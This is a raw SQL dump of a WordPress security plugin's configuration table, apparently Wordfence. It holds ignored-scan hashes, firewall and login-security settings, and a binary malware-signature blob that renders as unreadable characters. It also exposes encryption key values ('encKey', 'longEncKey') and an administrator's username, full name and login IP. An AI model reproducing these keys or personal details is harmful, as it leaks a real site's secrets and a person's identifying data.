a23a3f41c1cb86\";s:7:\"ignoreP\";s:32:\"c1f94b58f4b921454888faa55438db84\";}i:130;a:2:{s:7:\"ignoreC\";s:32:\"ac2909fc036a4184965775866aa9b871\";s:7:\"ignoreP\";s:32:\"ff22a06aa6ec3680e865e0de330ea93f\";}i:131;a:2:{s:7:\"ignoreC\";s:32:\"a775d3c76b9fed6d9c6dd385fd321316\";s:7:\"ignoreP\";s:32:\"b1edeb5e6575fa6efb0fdbc232a10834\";}i:132;a:2:{s:7:\"ignoreC\";s:32:\"d8c943dbd25f1725a40120bb4a57a0cf\";s:7:\"ignoreP\";s:32:\"503636563e3293c15958d4b651d6368e\";}i:133;a:2:{s:7:\"ignoreC\";s:32:\"de590f5380f537980359d0656d62d4a6\";s:7:\"ignoreP\";s:32:\"de590f5380f537980359d0656d62d4a6\";}i:134;a:2:{s:7:\"ignoreC\";s:32:\"1f209ee36257df79a8d2f288db1e01bb\";s:7:\"ignoreP\";s:32:\"1f209ee36257df79a8d2f288db1e01bb\";}i:135;a:2:{s:7:\"ignoreC\";s:32:\"524e30f8364e4b39ac55def35dc64683\";s:7:\"ignoreP\";s:32:\"524e30f8364e4b39ac55def35dc64683\";}i:136;a:2:{s:7:\"ignoreC\";s:32:\"005a473f7fcd9d53f4cfb5ae1432ede1\";s:7:\"ignoreP\";s:32:\"005a473f7fcd9d53f4cfb5ae1432ede1\";}i:137;a:2:{s:7:\"ignoreC\";s:32:\"65042967b01c5fcbdba16daa43fa7410\";s:7:\"ignoreP\";s:32:\"af20a961e18fd80cde80378231ea28de\";}i:138;a:2:{s:7:\"ignoreC\";s:32:\"09583b94c59b9bd97807fb6675cf0fa4\";s:7:\"ignoreP\";s:32:\"2e28baeb3cde8f0eafb8e24e39baaa48\";}i:139;a:2:{s:7:\"ignoreC\";s:32:\"116e0ae663fa34319851d05674d98e86\";s:7:\"ignoreP\";s:32:\"c3574b96ab844f8639d659ccd2810a9b\";}i:140;a:2:{s:7:\"ignoreC\";s:32:\"ded682f74be9f1cc4d297031e3fc51fb\";s:7:\"ignoreP\";s:32:\"bd42895014a06cb12547fa02ae5403df\";}i:141;a:2:{s:7:\"ignoreC\";s:32:\"efce1cb287e2710e294a3ef533541751\";s:7:\"ignoreP\";s:32:\"60db62820a4d37434e1027a3eca7b02b\";}i:142;a:2:{s:7:\"ignoreC\";s:32:\"d9c3ef4d4e0689663dc8fdbd3b9dc85a\";s:7:\"ignoreP\";s:32:\"d9c3ef4d4e0689663dc8fdbd3b9dc85a\";}i:143;a:2:{s:7:\"ignoreC\";s:32:\"18fb256ba88ce6569e1e4116c30dbd1e\";s:7:\"ignoreP\";s:32:\"18fb256ba88ce6569e1e4116c30dbd1e\";}i:144;a:2:{s:7:\"ignoreC\";s:32:\"0c4a424c6d945e41e5b33bfee123234a\";s:7:\"ignoreP\";s:32:\"0c4a424c6d945e41e5b33bfee123234a\";}i:145;a:2:{s:7:\"ignoreC\";s:32:\"7256a1547b27407d43edf8b03de53c27\";s:7:\"ignoreP\";s:32:\"7256a1547b27407d43edf8b03de53c27\";}i:146;a:2:{s:7:\"ignoreC\";s:32:\"1073faaddf9a9d5812bcc8f11b8fba8b\";s:7:\"ignoreP\";s:32:\"3909f9e49708268b278b9b598caeb3d8\";}i:147;a:2:{s:7:\"ignoreC\";s:32:\"d3aa06aa7df1a85fbf24d4214530a8bd\";s:7:\"ignoreP\";s:32:\"d3aa06aa7df1a85fbf24d4214530a8bd\";}i:148;a:2:{s:7:\"ignoreC\";s:32:\"6ca892eba2a371edc86e98092425c054\";s:7:\"ignoreP\";s:32:\"e73a0e8fb70327459f9cafe5ccaf4a46\";}i:149;a:2:{s:7:\"ignoreC\";s:32:\"0febb1ae69f463ed35d8aba7e81ffa4e\";s:7:\"ignoreP\";s:32:\"8382d4c5d5609c73c02d445d5c66931d\";}i:150;a:2:{s:7:\"ignoreC\";s:32:\"2de0bed8c6a1fa5c5c971563ef3efe94\";s:7:\"ignoreP\";s:32:\"a30f42b0d5770580b717b1ae4adfb1ac\";}i:151;a:2:{s:7:\"ignoreC\";s:32:\"67500fd81cc35cf893a70071dc2f137d\";s:7:\"ignoreP\";s:32:\"0cd64744108e40c4466063534eae7744\";}i:152;a:2:{s:7:\"ignoreC\";s:32:\"d89fe574df19dcf5282d2d4917665f24\";s:7:\"ignoreP\";s:32:\"4892c5370e502149a27fa3c947e1f58c\";}i:153;a:2:{s:7:\"ignoreC\";s:32:\"c5f0930034895f043a4b03f2afc7748e\";s:7:\"ignoreP\";s:32:\"d1b509d8b5da6eb26f1805a9662df42c\";}i:154;a:2:{s:7:\"ignoreC\";s:32:\"4614de1db76b97dd59ada7f4772750de\";s:7:\"ignoreP\";s:32:\"8d3da4bf0b4b39fdf07dde2271c8a410\";}i:155;a:2:{s:7:\"ignoreC\";s:32:\"05899bd9d82de6f822d4ed5ae5857d8b\";s:7:\"ignoreP\";s:32:\"13d866c30a70952c55313bd4dae19727\";}i:156;a:2:{s:7:\"ignoreC\";s:32:\"8aeb2b8378896deb57be3c1fddc6f76f\";s:7:\"ignoreP\";s:32:\"e732c70f0ee9e7858050a7d6520fcbd6\";}i:157;a:2:{s:7:\"ignoreC\";s:32:\"63a7d54a2858625cc194b9da319dade1\";s:7:\"ignoreP\";s:32:\"81d4c52892908a5f878db51aaf5eb0db\";}i:158;a:2:{s:7:\"ignoreC\";s:32:\"249b8b2da3b25341727961b5a8c83235\";s:7:\"ignoreP\";s:32:\"b4747aeafc7834a28ba60617a41c0e3d\";}i:159;a:2:{s:7:\"ignoreC\";s:32:\"66c09d38fd734f83ce75a807f50c8da2\";s:7:\"ignoreP\";s:32:\"4482b3f167db8ae79a5d583d024d662a\";}i:160;a:2:{s:7:\"ignoreC\";s:32:\"31a50b788decf35a6a1b492b1069a8ae\";s:7:\"ignoreP\";s:32:\"ecf2db109968b752085117548a961e46\";}i:161;a:2:{s:7:\"ignoreC\";s:32:\"43973cc277fd78a4461bb6ad7a75bd20\";s:7:\"ignoreP\";s:32:\"2c713e922b31b42c0981a4b85499f46a\";}i:162;a:2:{s:7:\"ignoreC\";s:32:\"cb3285485fcc890c482434586e0d8b2f\";s:7:\"ignoreP\";s:32:\"cb3285485fcc890c482434586e0d8b2f\";}i:163;a:2:{s:7:\"ignoreC\";s:32:\"cf11d9d26b3053f51f1160ed27460b29\";s:7:\"ignoreP\";s:32:\"cf11d9d26b3053f51f1160ed27460b29\";}i:164;a:2:{s:7:\"ignoreC\";s:32:\"099c629665b6aca70e7614eef49fc53b\";s:7:\"ignoreP\";s:32:\"244630a0acf7e22e3fa21bb115467007\";}i:165;a:2:{s:7:\"ignoreC\";s:32:\"199c1d9a68191952ac74dc81931e6a80\";s:7:\"ignoreP\";s:32:\"199c1d9a68191952ac74dc81931e6a80\";}i:166;a:2:{s:7:\"ignoreC\";s:32:\"07e16db3cb419c6875338b2023ee9972\";s:7:\"ignoreP\";s:32:\"07e16db3cb419c6875338b2023ee9972\";}i:167;a:2:{s:7:\"ignoreC\";s:32:\"37c69ba2000ff66525389c25b22f3137\";s:7:\"ignoreP\";s:32:\"431ea71df1a31fc8edbe5d1ebf6f094c\";}i:168;a:2:{s:7:\"ignoreC\";s:32:\"5b3b23726506df88339f6f893c04cd49\";s:7:\"ignoreP\";s:32:\"1b6b4aa5924c465d81dc286b66ac296f\";}i:169;a:2:{s:7:\"ignoreC\";s:32:\"e50574d728f8feaa4130cef417f74611\";s:7:\"ignoreP\";s:32:\"bb17456482a2f24f947a89b3d95096b0\";}i:170;a:2:{s:7:\"ignoreC\";s:32:\"cf6ac9c1eb102fa629ee3039f16c2401\";s:7:\"ignoreP\";s:32:\"779f020ec141388f4c36389ce6f1dab6\";}i:171;a:2:{s:7:\"ignoreC\";s:32:\"aa6fc24a3ae808fba8a6c720296b4ac0\";s:7:\"ignoreP\";s:32:\"82a49cbe60fe6224a4b730b173535217\";}i:172;a:2:{s:7:\"ignoreC\";s:32:\"03ce89d57e1b43424e6452ab22015a25\";s:7:\"ignoreP\";s:32:\"0929b4cb19f3dcbe0fed65baf7061e38\";}i:173;a:2:{s:7:\"ignoreC\";s:32:\"d6d4bb0dbe74b3d8e3cec2e95957b3f7\";s:7:\"ignoreP\";s:32:\"39b5a2d4b038993c9b5b4432d5972c13\";}i:174;a:2:{s:7:\"ignoreC\";s:32:\"81e8b064183fecf6bd9bad6df078c5c7\";s:7:\"ignoreP\";s:32:\"3fbe3a684b0574ed51800f18dbfaafb4\";}i:175;a:2:{s:7:\"ignoreC\";s:32:\"57bab64bfc0d731bbe1c35759f31c822\";s:7:\"ignoreP\";s:32:\"2ab17afc20ee03f8a915ae30504110d9\";}i:176;a:2:{s:7:\"ignoreC\";s:32:\"0514f10c1dfff6c4d1385ef7f4049f96\";s:7:\"ignoreP\";s:32:\"fd5fc33b365434aa30fe537941e1a7c2\";}i:177;a:2:{s:7:\"ignoreC\";s:32:\"3383ebc919b50506408eb2a3504f992b\";s:7:\"ignoreP\";s:32:\"dea2f28e9a1d9113490692231abb9aa0\";}i:178;a:2:{s:7:\"ignoreC\";s:32:\"868021ef9335bd33ce53c44d6a893281\";s:7:\"ignoreP\";s:32:\"3c9422b3705147d594eed009b893748c\";}i:179;a:2:{s:7:\"ignoreC\";s:32:\"db49b7311ebd9acb7b26ea8b647471e5\";s:7:\"ignoreP\";s:32:\"001b376cc85738d836853078b4074ff3\";}i:180;a:2:{s:7:\"ignoreC\";s:32:\"efffb4bfaf4dbf035f671dade0432fbd\";s:7:\"ignoreP\";s:32:\"fc8470fa7c30ad643c736c352264ac3a\";}i:181;a:2:{s:7:\"ignoreC\";s:32:\"7ce4d2492bf20aa321e75c3d470ba826\";s:7:\"ignoreP\";s:32:\"7ac8fb41cd09b63b98f25ae18f2f014e\";}i:182;a:2:{s:7:\"ignoreC\";s:32:\"3bea87ad5545cbc45e5611427263397d\";s:7:\"ignoreP\";s:32:\"9b9e221607eae1e486adee91b04638c9\";}i:183;a:2:{s:7:\"ignoreC\";s:32:\"8f897f62fcc5ccd179793f9d023cc255\";s:7:\"ignoreP\";s:32:\"1202aeba857bb8804d65f813d6306829\";}i:184;a:2:{s:7:\"ignoreC\";s:32:\"45386d7da1242b96aa4e8e06d33c3975\";s:7:\"ignoreP\";s:32:\"2339f8cb56edff768b2b705dc6aa84a7\";}i:185;a:2:{s:7:\"ignoreC\";s:32:\"a8c81f7a8171b38bcc55a180fa2d0ce0\";s:7:\"ignoreP\";s:32:\"a8c81f7a8171b38bcc55a180fa2d0ce0\";}i:186;a:2:{s:7:\"ignoreC\";s:32:\"ce11e58527ad493e4e6efdfe48935b15\";s:7:\"ignoreP\";s:32:\"ce11e58527ad493e4e6efdfe48935b15\";}i:187;a:2:{s:7:\"ignoreC\";s:32:\"9bcbc6107176cf3071634ea3858f1b4e\";s:7:\"ignoreP\";s:32:\"9bcbc6107176cf3071634ea3858f1b4e\";}i:188;a:2:{s:7:\"ignoreC\";s:32:\"2d964464ce8273542a0aa48addd94bf6\";s:7:\"ignoreP\";s:32:\"2d964464ce8273542a0aa48addd94bf6\";}i:189;a:2:{s:7:\"ignoreC\";s:32:\"78ffb7cc5a8a4c2cf9432df023570bab\";s:7:\"ignoreP\";s:32:\"78ffb7cc5a8a4c2cf9432df023570bab\";}i:190;a:2:{s:7:\"ignoreC\";s:32:\"3460b7dc8f73c98ce2a637de8a6334c7\";s:7:\"ignoreP\";s:32:\"3460b7dc8f73c98ce2a637de8a6334c7\";}i:191;a:2:{s:7:\"ignoreC\";s:32:\"25a0c0744fdece933dc570b5a35c39d4\";s:7:\"ignoreP\";s:32:\"25a0c0744fdece933dc570b5a35c39d4\";}i:192;a:2:{s:7:\"ignoreC\";s:32:\"1864ccdb017669c61d1198f37fde1dbc\";s:7:\"ignoreP\";s:32:\"1864ccdb017669c61d1198f37fde1dbc\";}i:193;a:2:{s:7:\"ignoreC\";s:32:\"57cb8a1275e07c18e4d75c6fcc94cc65\";s:7:\"ignoreP\";s:32:\"57cb8a1275e07c18e4d75c6fcc94cc65\";}i:194;a:2:{s:7:\"ignoreC\";s:32:\"3a61010384804e62d55dd11d00dcefd3\";s:7:\"ignoreP\";s:32:\"52b9f815761580a3cf5e7c18b5790106\";}i:195;a:2:{s:7:\"ignoreC\";s:32:\"f2954dccb3284bf63a45a496e9355e6e\";s:7:\"ignoreP\";s:32:\"f2954dccb3284bf63a45a496e9355e6e\";}i:196;a:2:{s:7:\"ignoreC\";s:32:\"85a13657ca61fcfb776ae3f256a64f4a\";s:7:\"ignoreP\";s:32:\"0ad28d40c48bf58f31a7088d95ade4ec\";}i:197;a:2:{s:7:\"ignoreC\";s:32:\"950f62afaf44d814f06f11eae611e1a9\";s:7:\"ignoreP\";s:32:\"950f62afaf44d814f06f11eae611e1a9\";}i:198;a:2:{s:7:\"ignoreC\";s:32:\"0f66c60368dd2095c04ddca82b3c70a7\";s:7:\"ignoreP\";s:32:\"0f66c60368dd2095c04ddca82b3c70a7\";}i:199;a:2:{s:7:\"ignoreC\";s:32:\"49205adac85de88c2904d1978c89e748\";s:7:\"ignoreP\";s:32:\"49205adac85de88c2904d1978c89e748\";}i:200;a:2:{s:7:\"ignoreC\";s:32:\"09e28a9dc73c1af1d1ab8435c915afe6\";s:7:\"ignoreP\";s:32:\"09e28a9dc73c1af1d1ab8435c915afe6\";}i:201;a:2:{s:7:\"ignoreC\";s:32:\"15cd56ba0b2c9cdc96daf6733fcef0f6\";s:7:\"ignoreP\";s:32:\"15cd56ba0b2c9cdc96daf6733fcef0f6\";}i:202;a:2:{s:7:\"ignoreC\";s:32:\"ab6d8ef73c2171e40d00e9cdc6fd7586\";s:7:\"ignoreP\";s:32:\"ab6d8ef73c2171e40d00e9cdc6fd7586\";}i:203;a:2:{s:7:\"ignoreC\";s:32:\"b96fd4c75a6bfc30de79ac9f670f80c1\";s:7:\"ignoreP\";s:32:\"d146d504ee2ad86daa56dc13daf96d83\";}i:204;a:2:{s:7:\"ignoreC\";s:32:\"95b11b83bb3a54be4bc46a9326231866\";s:7:\"ignoreP\";s:32:\"95b11b83bb3a54be4bc46a9326231866\";}i:205;a:2:{s:7:\"ignoreC\";s:32:\"5ad8d58338c0ddcd5b6364e2eb77fc14\";s:7:\"ignoreP\";s:32:\"5ad8d58338c0ddcd5b6364e2eb77fc14\";}i:206;a:2:{s:7:\"ignoreC\";s:32:\"85fdcc578a4cf117ac3369044b76e621\";s:7:\"ignoreP\";s:32:\"7f03f1cda7529de7e6e84a2d4d8ba6cd\";}i:207;a:2:{s:7:\"ignoreC\";s:32:\"e9fe0040b214034bde2b19c01ef3bfb3\";s:7:\"ignoreP\";s:32:\"d634ed1bf6dfae901a440ed034676991\";}i:208;a:2:{s:7:\"ignoreC\";s:32:\"fd0f3d805f1e0dd338d2f3825d15528f\";s:7:\"ignoreP\";s:32:\"698163c868e146d5bda18c47e6d521ff\";}i:209;a:2:{s:7:\"ignoreC\";s:32:\"81309e2fb1c69b848587355b47eddc8a\";s:7:\"ignoreP\";s:32:\"16f6ab98f701b73049b50e56eb9548ec\";}i:210;a:2:{s:7:\"ignoreC\";s:32:\"77776ed08e931f6a96a69a1d0e90d042\";s:7:\"ignoreP\";s:32:\"ba0abb5bb89436c58839a12ca2bc4da1\";}i:211;a:2:{s:7:\"ignoreC\";s:32:\"1f34f801b8b0af58e80d9d67f06a8938\";s:7:\"ignoreP\";s:32:\"a02020f428891e855a746bf0e186370f\";}i:212;a:2:{s:7:\"ignoreC\";s:32:\"fa27ec796ad6b8a640ff7174d5458291\";s:7:\"ignoreP\";s:32:\"1d57671fc387431b76bc73134f9d283d\";}i:213;a:2:{s:7:\"ignoreC\";s:32:\"d18856cd0a80df653852a3a53ee714e7\";s:7:\"ignoreP\";s:32:\"d99b81a1fbc1d7c713c3fdb919b7bb80\";}i:214;a:2:{s:7:\"ignoreC\";s:32:\"0a8ec1ade738c0c9a1423cd433b8d3ba\";s:7:\"ignoreP\";s:32:\"a25e4e183487d9dde61061896c0daf87\";}i:215;a:2:{s:7:\"ignoreC\";s:32:\"87dce87c638ce62a274358cb0aff2c61\";s:7:\"ignoreP\";s:32:\"0c19703e034b7c88adb647e37365debf\";}i:216;a:2:{s:7:\"ignoreC\";s:32:\"0108571f00b3c365a6bdad4f02f2ff13\";s:7:\"ignoreP\";s:32:\"46b7d4c5ba1757b4b34d160118fef879\";}i:217;a:2:{s:7:\"ignoreC\";s:32:\"a43bc0e16df0be25520b7e6f34b95c0c\";s:7:\"ignoreP\";s:32:\"6a9399210c9699ae9cb40826736e203f\";}i:218;a:2:{s:7:\"ignoreC\";s:32:\"7a72b63ca151fc2b84464850b02d0c1a\";s:7:\"ignoreP\";s:32:\"e7076e5e34219508a313143ae6ca1981\";}i:219;a:2:{s:7:\"ignoreC\";s:32:\"e528da66c4302f204ce1f2e30574bdb5\";s:7:\"ignoreP\";s:32:\"bdb3db5f3e26cc6d396e7aed9fd7e8aa\";}i:220;a:2:{s:7:\"ignoreC\";s:32:\"8c024b896031a0a8a79c8e667514c7f9\";s:7:\"ignoreP\";s:32:\"20ff00fe6319bf1a9ecc9a9236676530\";}i:221;a:2:{s:7:\"ignoreC\";s:32:\"43e0b326c0eb6afc47d7a1315dd16e25\";s:7:\"ignoreP\";s:32:\"ce1ff41682e43e90b13086120640a648\";}i:222;a:2:{s:7:\"ignoreC\";s:32:\"40fc1771fd1e472f0b1f0472f06f226d\";s:7:\"ignoreP\";s:32:\"b82480185f77d923cb6920ae8ec9f1a6\";}i:223;a:2:{s:7:\"ignoreC\";s:32:\"c47110e4dead9325c5fa7ae7aed5e69a\";s:7:\"ignoreP\";s:32:\"97944b5a9591c3d520a748da8f068971\";}i:224;a:2:{s:7:\"ignoreC\";s:32:\"e9c1b3affaf584f84e26caf15b4498c3\";s:7:\"ignoreP\";s:32:\"96893886513520bcb3a0a968466716f7\";}i:225;a:2:{s:7:\"ignoreC\";s:32:\"ac82a662df22974773d0a81d99ef02d1\";s:7:\"ignoreP\";s:32:\"ac82a662df22974773d0a81d99ef02d1\";}i:226;a:2:{s:7:\"ignoreC\";s:32:\"b816bad694c98b8e88ae2a20ce5eaa44\";s:7:\"ignoreP\";s:32:\"b816bad694c98b8e88ae2a20ce5eaa44\";}i:227;a:2:{s:7:\"ignoreC\";s:32:\"bfc90fb7188c0a77247afaa072e1047d\";s:7:\"ignoreP\";s:32:\"bfc90fb7188c0a77247afaa072e1047d\";}i:228;a:2:{s:7:\"ignoreC\";s:32:\"e8b8e4ddcc9ed5230d5e336545193b65\";s:7:\"ignoreP\";s:32:\"e8b8e4ddcc9ed5230d5e336545193b65\";}i:229;a:2:{s:7:\"ignoreC\";s:32:\"5605180bf338a5ad78c0b7fc134277a1\";s:7:\"ignoreP\";s:32:\"6947fb32a34921ab3558d83e465e5a11\";}i:230;a:2:{s:7:\"ignoreC\";s:32:\"723a2ec3b4721043be703f8538340e28\";s:7:\"ignoreP\";s:32:\"1c11e595627838aea318bc106ea8ceda\";}i:231;a:2:{s:7:\"ignoreC\";s:32:\"333f541c54338df6c5110fb03168bf03\";s:7:\"ignoreP\";s:32:\"ca21bf982bfe60c87f6c125d651d29aa\";}i:232;a:2:{s:7:\"ignoreC\";s:32:\"bd96d8ec48b731208fce2940cd4649c6\";s:7:\"ignoreP\";s:32:\"96a07398b0b645451634884404de248d\";}i:233;a:2:{s:7:\"ignoreC\";s:32:\"9bb08aba01a48995183d25ef87299cfc\";s:7:\"ignoreP\";s:32:\"c7ca5ebc29b66c56c8c7c5ec6ae65f54\";}i:234;a:2:{s:7:\"ignoreC\";s:32:\"41505d8aa7a07070eaf998f9a71f1be3\";s:7:\"ignoreP\";s:32:\"41505d8aa7a07070eaf998f9a71f1be3\";}i:235;a:2:{s:7:\"ignoreC\";s:32:\"3709f2afddb5a94fae77f6331db505b4\";s:7:\"ignoreP\";s:32:\"3709f2afddb5a94fae77f6331db505b4\";}i:236;a:2:{s:7:\"ignoreC\";s:32:\"1920486feba1252bebc94efc133a78ec\";s:7:\"ignoreP\";s:32:\"1920486feba1252bebc94efc133a78ec\";}}','yes'),('email_summary_dashboard_widget_enabled','1','yes'),('email_summary_enabled','1','yes'),('email_summary_excluded_directories','wp-content/cache,wp-content/wflogs','yes'),('email_summary_interval','weekly','yes'),('encKey','fa754e736f27fd96','yes'),('fileContentsGSB6315Migration','1','yes'),('firewallEnabled','1','yes'),('geoIPVersionHash','7b1f8efb28ae9da68439581361a100c2ba1e7061c4cd960f2d80a91c33a54578','yes'),('howGetIPs','','yes'),('howGetIPs_trusted_proxies','','yes'),('isPaid','','yes'),('keyType','free','yes'),('lastAdminLogin','a:6:{s:6:\"userID\";i:3;s:8:\"username\";s:6:\"nazeer\";s:9:\"firstName\";s:6:\"Nazeer\";s:8:\"lastName\";s:8:\"Abrahams\";s:4:\"time\";s:28:\"Wed 28th August @ 12:15:39PM\";s:2:\"IP\";s:15:\"165.255.168.132\";}','yes'),('lastAttackDataSendTime','1567052475.547858','yes'),('lastBlockAggregation','1567012421','yes'),('lastBruteForceDataSendTime','1564614313.761400','yes'),('lastDashboardCheck','1567012421','yes'),('lastEmailHash','1566987339:0bbfaf181eab7252a274d5f5dbef1e0a','yes'),('lastError_prev_geoip','[1557740019,\"Undefined offset: 101\"]','yes'),('lastError_rate_geoip','1557740019','yes'),('lastFalsePositiveSendTime','1564049407','yes'),('lastNotificationID','694','no'),('lastScanCompleted','ok','yes'),('lastScanFailureType','','yes'),('lastScheduledScanStart','1566807587','yes'),('liveActivityPauseEnabled','1','yes'),('liveTrafficEnabled','0','yes'),('liveTraf_displayExpandedRecords','0','no'),('liveTraf_ignoreIPs','','yes'),('liveTraf_ignorePublishers','1','yes'),('liveTraf_ignoreUA','','yes'),('liveTraf_ignoreUsers','','yes'),('liveTraf_maxAge','30','yes'),('liveTraf_maxRows','2000','yes'),('loginSecurityEnabled','1','yes'),('loginSec_blockAdminReg','1','yes'),('loginSec_breachPasswds','admins','yes'),('loginSec_breachPasswds_enabled','1','yes'),('loginSec_countFailMins','240','yes'),('loginSec_disableAuthorScan','1','yes'),('loginSec_disableOEmbedAuthor','0','yes'),('loginSec_enableSeparateTwoFactor','','yes'),('loginSec_lockInvalidUsers','0','yes'),('loginSec_lockoutMins','240','yes'),('loginSec_maskLoginErrors','1','yes'),('loginSec_maxFailures','20','yes'),('loginSec_maxForgotPasswd','20','yes'),('loginSec_requireAdminTwoFactor','0','yes'),('loginSec_strongPasswds','pubs','yes'),('loginSec_strongPasswds_enabled','1','yes'),('loginSec_userBlacklist','','yes'),('longEncKey','0aeee11edd8030284723ad87951f9910935b913a1b77c98ba2dc8143e007a9aa','yes'),('lowResourceScansEnabled','0','yes'),('lowResourceScanWaitStep','','yes'),('malwarePrefixes','\0\0\0\0\0\0y8\0ٗΝ;˽sIYJBR$RI%QDZHJ!I+JHi!*)EE+&~yy33>ǌ\no>^\'_wBx1uO\Z %e\r?EC)M>8)}uׄ-X1ffm\0\0\0ra?\0xG7\0?)`\04DK@bH\0Y+ gZ\0p\Z\0@1Pt180\0v6. );ռ\Z@U	{\0u\'@p_F\\q4\0Z.=_\r0ht&:A!\0]߀\n@7\0b?g];al`,[0``x,0`00a$`d0ZU\\\0>K>&)/S5);0r=	7?`\\C`9*XXՐd`~`6LXK֗_W6$`tt/<$p87O\0`m0m.V!kH,\ZHf~x89u6~\\\\`w<:`^s0\0,?\0,H{\r,8,(N\0\\Y\0,x,x\0cOӀg#`-u७xxs/]\0,%|l0,Yg8`р]C\'v\0k܀\0& `O,:	X&\"@`H h4 8Z܁s`I\Z0XӺٛA@XPv/6\"J b\Z \"k\0X:\0Q U5dDG]\06=]lnX[V@.E$.-ض,; ~j >Nu灄@B#8H7H|;؁.v+$ i?s +\n	؍,v4{f7go`>w`^`_N`R<)A=qR M6f0\nH/\02Kg; c\"9P0%kӢ@D g= 3pdQ!p4pY@zs pN\Z\nt_Tp[B@Ipm\Z=(n1\ZY\Z{{%\'F|\0*^&)@(2(OR˧w&W\0`m=P2@k@F:P}|7:S[9Z]rә\05Gf6\0|}E$p@xxx82/4htxt8S4πcÀQG^@6y <xaj\rxi9x9Y	^^Kږmb൷=:$x1x;r)Юc\r	|hK:́O|ϻu/o]#[?@@=\r_ǾU7c\"oN)0KK 4M?Ч |c@ĺDh-/1\'qĝxx6$/E.8(Z;]ˢ@@k@$P2[߀2hPu:HDT3@f\'{ GܺP\0UAUR\0~P-En8Uj饁ZZ|AM~!Uj?j?{*\r:A-vpp)8DWZ;@Wh84-zq	8l0p4N\r_[\rp?8X\Z}M\0]A;A	@8.8\Z\\}Z м{*gpb8\0h9v>hh5JN\0@kh\rh}lmN^mAoE/@;~U8i?>&/\'?O\0|D@@\'pZz!<8=]#~3g3G35\r+GYnn_A!8XyE\r$%!o==Ꟁgp\0/yhApQ\ZK:R..n烾K=GKTkeWd+OW|7]W>G0آ4W]\0WX	{0?^Xuǀ#߂!Mu+>oQ>3F4\0^5	>	F>n\\]< \r\npLp+Vf=u7m2p[Wpۉ}\'0nb\0I`,p;Ll6GX)&\n&?w}H{{=\0߯*Sx-e`ڑ+`r0\r>hxpD0[=*p灇^\0RlUݞ\0\0s1c/U`\"38_R\n̛\0512 y6X,<x9*XX,`3%OMY+s<&<\r,60K@0<0lXe3JB0+.+g)7gxyE\\H+FEWo?E<kC9u5,ޮowuw^Ƹ\'Р	>\nj\0}qw=`S=-{(\'oi$l-#g/_$//Ԃ+W?u\0	sߵz{^Cct<1<\0vmONsۧO/ ~U>}8X	v]:X\nv{D{N?1bo2_WvWu6\Z#?࿲0k;W; 47Cp #\n{0\0v|!b9.y l1m#!r\'\Z\n!ѼXH%:+!驫[Hfɾ\\SŐ-D\ri\'!h)1Rj/w, ά!?H0	VG!a$49 wA4_HG{O\r\rt<{\r˟}Wwo@CAܞA|AJa Â+Ј5Yrh#\Z\n2%!Fi-FF\'L4Bcd%И+ 3dȜ\"]-8$Ȳp*dYBV@\'C,t $dmMX k ErHQBsSiِhڪ7ȹ;l\0\0M\'Ch.ճr]=rr}5*=$4O_<	-<C $IxAs]4hBo3h=Z4|=+Sȫv\'yZCK<AK%ի!! x}\Z  7wOfB+\r@+ch垅ʻáo@+{CP`;h;Z5Zդ\"h5v7VB/Ck\ZPH(t:_d(!;~hR	,	5brnAVB+>A[C[w|,=I$03J9\0%\nmjЎ(ɴJ%m/%\n%_vM\nqOA)g_@)/ڠTq%tVO|\0L	\neAfYP(9Opy(kHkCG8tditȓ(g{k	_\r?~ʷ̀#G@CwC\'_		YЉ[*Zj}	BCET9*>*	Ag\n~CŊPq*?*)̂JNι*swCcʠp|7tT2TAWA3%/	t	UM_Uqn]]MBGk	kC5\rPGtscLX9\0i: :׮ݏzj=5n\'BO@@uPwj3%Yk\rzMzmrԾ9zqeԑiu\nuz:ʠOZ~MЗoзFNr	u{_ks3zPoUsmgaWA<R>{пlFa4q0zm`Fuw`&/Är܂I`L(	[KM%\'Kɰ,\ne?a:*_F7`eV&0C`Ns`˰qXXΰt5,4\ZdXCk:\"u|&:mPx}>!]{C0<6t><\04\09\r`Ol\\k	|MY^$6wh-V6k`Ex|=غlS4m6¶_Rėn>~!<9v};\\4\rSoiӪ_ӞR(y\rعB?]*q	gN\r0gfngnR`bxN<P=w/ج=`]xx>xѹW?x}x[.|t}F$qx\r0PxCexxYjxY+OoU	\rKag\r\0^Yp	ژÁk\Z`>޸^=E}Aap[mሳYpy1	#oQ3]8t11l!ǂ;x[(x6sy\0ǏW-__;hxǑpҴhx\'>v#y;8x_{TISqkC74[N[_no[\rs78c6g	gfK:#M>Q>z>f>LyGpޣp	\"\n>p>>	,;§N]YE\"H̰ٚmK..Yu.9>r|<.cS\rp!pm\\u!|1Z%&g.|\rµpv-#62ckqku.sWe?q<m@>n7oÏVMZǧOfͻg5w~Q9n=L/=W+W?UH^]-߫w6XF;~)o5x*oMgwr\roww?6{\Z=s1ý:˫_#_\'?^K#_p?[<\0>\"@n>7So#h}=D^q!D<9\0ND$!/R9!&MDu$BO#JaL}؊poG_ sWNDQGDxv\nѲhE ZmLDn_h\rD GtCt~5\"ŝoDDG1{NF>@!!1\\w1\n@֚\"F}v蟦}bڸ\'2f>bVeK& ^o]\"u\'2[jX*G#g+ub	%Ґu}\\daȤc+{{	2eq{q(F!N:iayCc*|<q>qrq9}<^	2Պ%Y[713\Z2j\"2B\Z2)23D﹇̯Z,x!a%gsx,ܾY!^o@#KjZ	R}CdUC2h$gA +NBUYH*Yٽ	\\	FmU?U4(ІǝEOBVEV7CLđ5G	)XN[֤#KA$Zdnnsd\"YTl\0h$:]qqG6Ȗ)ȶÑm)xj$$,Z$$$Ew7J$,$\rsٹ|\"{!{uW {#{?mF]@Sϐ>  )\")\ZERCR7\"\" #i[ u$$sxиa.pb3uE: ٽ{޻ȱH6=!ybJ9y9YmiEhrr\0r&\n9S9k9;3rR<)EJ,s}<R:7R>P͡gHD8rI\\?\Z<B.!W^k# w*&*:aR%NmDjGjn#7:JZHHo䦤َ !QH]1r/[{\'r-4#U\"5H)G{ȓ7{ޅHȳ,Ke$1¿yyyE!mH8\Ze&NykyywyꁴK;H{m?8C\\v=D:_\"V|C>@>8B,[|)B@.B|ьF~h ހR7-4{>z}U@&; }KH3	_po(\'\nu:	Eʛ(\ZEk(tBq(YEŢش?ʮODB3PF/e>c(ېr#PpTsd5ܨA<~Pq*T/2ߠzPRT7?F٨Aj-BCGOGIq:lLPfQCPB-]j5:\":7\"j\Z@\\Va7{e脕5cQ}cщ>N޲ǡuPǙCQ:Tgixt=u)B]ζӱ2tz=x:Ctɖn[e;:Ξzu{	S΍[뚌|.0z {zT.=\rђ>Eo6